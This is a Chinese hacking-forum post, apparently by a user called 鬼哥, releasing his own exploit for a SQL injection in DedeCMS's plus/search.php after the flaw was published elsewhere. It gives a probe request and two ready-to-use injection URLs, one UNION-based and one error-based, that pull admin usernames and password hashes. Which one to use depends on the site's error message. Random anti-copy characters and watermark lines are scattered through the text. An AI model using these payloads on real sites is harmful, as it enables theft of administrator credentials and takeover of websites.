转载不加作者名的没JJ7 Y- S- P' V5 A1 r* |9 y# n
7 s4 o" c1 w- F3 e' L, n1 E: r
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
$ a1 F$ I9 v# j% e
: z# k5 E8 _3 }) W; m7 C既然已经发出来了,我就把我自己搞的exp发下吧。。唉。- H: `5 I3 S& p: K) D
% H) m1 }2 f$ _; @9 x" N4 M我一般是这样测试的:
$ A. v. f5 a4 n! m" B" W+ [, [' T& u7 i
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
& F) M2 |& [& O/ z) `! ]7 A/ a" K$ q0 F+ a& ?& ?/ e
转载不加作者名的没JJ" ?) E9 p$ D0 q9 _: ? Q: ^
0 Y6 l; A: x) c3 t! u( n作者:鬼哥3 r5 G$ S1 y7 o4 A& P0 }7 c- B
# V& m2 q ?9 `+ B- Z- c$ J
' Z% ~; J0 Y. }* m. x7 {) l: j6 H1 Y
看结果如果提示
& S5 _/ ^( K0 A% `
0 N' C: }( n& `( Z. m' w% dSafe Alert: Request Error step 2 !5 M- W; J7 F) s4 Z- {: f
) G$ k x6 s" C
那么直接用下面的exp1 j+ p9 m) S* q# ~/ k
' C( T; g$ T9 _
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
3 D. H3 y7 p, r6 }! S# V; ^% X) l% h. O& `4 t* d6 c
. h7 q& M. }, ~% Z
看结果如果提示- Z1 U2 o: o9 ?0 ~' M
0 s V) P5 ^6 F* x f
Safe Alert: Request Error step 1 !3 W0 Y2 c5 V) T! k# q
; n+ n8 _: D5 F8 X- o6 h) \
那么直接用下面的exp
6 D0 C7 O& P: B2 y. G0 ]: s- |+ v7 X; Y# W8 b- p
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
6 A2 j" U3 X5 s* i1 F/ c& A% p* M; W" u% c' ?' j
% V+ h- p" [. T) v. i: a% W如果正常显示证明漏洞不存在了。( X4 L/ h: E* e n" n+ ^
# A _+ a' Z0 F# V9 N+ @% \4 h转载不加作者名的没JJ |